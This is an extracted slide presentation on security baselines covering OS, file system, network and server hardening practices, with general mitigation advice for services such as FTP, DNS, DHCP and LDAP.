security baselines

SECURITY BASELINES

-Sangita Prabhu

Overview

OS/NOS vulnerabilities and hardening practices

Operation and security of file systems Common Network Hardening Practices Best practices in securing web services

OS/NOS Hardening

Making OS more secure to outside threats

Categorization of disrupting actions Attacks Malfunctions Errors

Best Practices for System Hardening

Remove unused applications and services Strong Password Policies Limited number of administrators Account lockout Latest security updates and hot fixes Maintain external log Periodic backup

File Systems Hardening

Configuring Access Controls Setting Privileges on files and data objects

Creating User Groups Grouping users by common needs

File encryption capabilities Resource consuming feature

Configuring Access Controls

Common Practices for setting file and data privileges: Disable write and execute permissions for all

executables Restrict access to important files Pay close attention to access control inheritance Make all log files “Append Only” if the option is

available Prevent users from installing, removing or editing

scripts

System Updates Minimize gap between release and installation of a

security patch. Monitor security-related Information

--Mailing lists, security related sites, Hackers sites Evaluate Updates for Applicability

--Paper Logs Plan the installation of Updates

--unsystematic and haphazard updates could introduce new vulnerabilities to networks

Document update plan Deploy new systems with latest software

Network Hardening

Firmware updates Configuration

Best Practices in configuring Router and Firewall systems

Maintain a copy of current configurations Never allow IP-directed broadcasts Configure devices with meaningful names Always use description for each interface Always specify bandwidth on the interfaces Always configure loopback address

Network Hardening

Best Practices in configuration contd…

Avoid using common words for password and naming schemes

Deploy logging throughout the network Restrict data traffic to required ports only

Access Control Lists

ACL is a set of statements that controls the flow of packets through a device based on certain parameters and information within the packets

ACLs implement packet filtering Packet filtering rules can be designed based

on intrinsic and extrinsic information pertaining to a data packet

Designing filtering rules

Best Practices Deny all packets unless explicit permissions Design antispoofing rules Identify protocols ,ports, and source and destination

addresses that need to be serviced on your networks Configure the rule set of ACL by protocol and by port Place “deny all” rules at the end of the rule set

Enabling And Disabling Of Services And Protocols

Running unnecessary services on the network devices makes them vulnerable

Administrators should identify and remove all unnecessary services

Required services should be evaluated and installed in a manner to lower potential risks

Example: RPC and SNMP– if needed then should be accomplished via VPN for security

Commonly Exploited Services

Service Description Default NoteSNMP Protocol Routers can support

SNMP remote query and configuration

Enabled If not in use, explicitly disable or restrict access

Domain name Service

Routers can perform DNS name resolution

Enabled Set the DNS server address explicitly, or disable DNS

IP Source Routing IP feature that allows packets to specify their own routes

Enabled This rarely–used feature can be helpful in attacks; disable it.

Some Examples of commonly exploited services on CISCO platforms

Application Hardening

Web Servers Isolating Web Servers Configuring web servers for access privileges Identifying and Enabling Web Server-Specific logging

tools Considering security Implications Configuring Authentication and Encryption

Application Hardening…

E-mail Servers Attachments with malicious contents E-mails with abnormal MIME headers Scripts Embedded into HTML-Enabled Mail Defense mechanisms:

Latest software updates and patches Email content filtering using email gateway products Deployment of virus-scanning tools on the server Attachment checking mechanisms HTML active Content Removal


FTP Servers Protecting against Bouncebacks

--Using FTP servers to connect to the attacked machine rather than connecting directly

--Makes difficult to track the attacker

--Configure servers to not open data connections to TCP ports less than 1024

--Use proper file protections

--Disable PORT command : It also disables PROXY FTP which might be needed in certain situations

FTP Servers…

Restricting Areas Protecting Usernames and passwords

Utilize alternate authentication mechanisms to avoid attempts to intercept clear text password

Limit number of attempts for a legitimate password Limit the number of control connections Return same response USER command, prompting

for the password and then reject the combination of Username and Password

Port Stealing : Deploy random port assignments


DNS Servers Inaccurate Data on IP Address Ownership

Without accurate IP ownership data cannot distinguish between innocent users and attackers

Customer Registry Communication Use encrypted communication

DNS Spoofing and Cache Poisoning Not Updated root.hints files Recursive Queries Denial of service Attacks


NNTP Servers (Network News Transfer Protocol) Messages are delivered to Newsgroups instead of

individual users Newsgroups acts as a storage for the related messages News Client is used to read messages To gain access to new postings users need to access news

servers NNTP is designed to store news article in a central

database and allow user to choose only the items of their interest

NNTP Servers…

Typically, NNTP servers run as a background process on one host and accepts connections to other hosts

Have similar vulnerabilities as any other network services

Proper authentication, disabling of unneeded services and application of relevant software and OS patches are effective methods to prevent attacks

Application Hardening

File and Print Servers Offering only essential Network and OS Services on a

Server Configuring Servers for User Authentication Configuring Server Operating Systems Managing Logging and other data collection

mechanisms Configuring servers for File Backups


DHCP Servers (Dynamic Host Configuration Protocol) Assignment of dynamic IP Addresses to devices on the network Simplifies network administration Has no security provisions therefore vulnerable to attacks

Broadcast-based protocol, therefore, attacker can use a sniffer program to collect critical network information.

Spoof official DHCP server : Redundant DHCP servers are allowed

Launch DoS attack against the DHCP server

DHCP Servers…

Certain steps to prevent such attacks Permanent address assignments with DHCP Allow dynamic addressing and monitor log files

for malicious user Force stations with new MAC addresses to

register with the DHCP server Intrusion Detection tools can be used Latest software and patches are important

Data Repositories

Directory Services Lightweight Directory Access protocol (LDAP) LDAP directory is a special kind of database that

stores information Based on simple tree-like hierarchy, called a Directory

Information Tree (DIT) Threats to LDAP can be categorized in two groups:

Directory Service-oriented threats Non directory Service-oriented threats

Directory Service-Oriented Threats

Unauthorized access to data Unauthorized access to resources Unauthorized modification or deletion Spoofing of directory services Excessive use of resources

NonDirectory Service Oriented Threats

Common network based attacks to compromise the availability of resources.

Attacks against hosts by Physically accessing the resources

Attacks against back-end databases

Security of LDAP

Based on two processes Authentication

Anonymous—No specific authentication Simple Authentication– Plaintext Passwords Simple Authentication and Security Layer (SASL)—

Exchange of encrypted data (Most Secure) Authorization

What resources, application and services are accessible by an authenticated client

Databases

General Principles of Security-- Authentication of users and Applications

Ensure use by Legitimate users only Determining access privileges Applications require username/password to use the

database Administrative Policies and Procedures

Written security policy Initial Configuration Auditing Backup and Recovery Procedures

security baselines

Documents